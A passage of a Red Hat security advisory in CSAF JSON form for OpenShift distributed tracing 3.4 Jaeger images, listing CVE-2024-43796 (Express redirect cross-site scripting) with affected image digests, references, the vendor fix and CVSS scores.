distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "http-proxy-middleware: Denial of Service" }, { "cve": "CVE-2024-43796", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2024-09-10T15:30:28.106254+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2311152" } ], "notes": [ { "category": "description", "text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", "title": "Vulnerability description" }, { "category": "summary", "text": "express: Improper Input Handling in Express Redirects", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-43796" }, { "category": "external", "summary": "RHBZ#2311152", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796", "url": "https://www.cve.org/CVERecord?id=CVE-2024-43796" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796" }, { "category": "external", "summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", "url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553" }, { "category": "external", "summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", "url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx" } ], "release_date": "2024-09-10T15:15:17.510000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-10T11:04:35+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10917" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.0, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 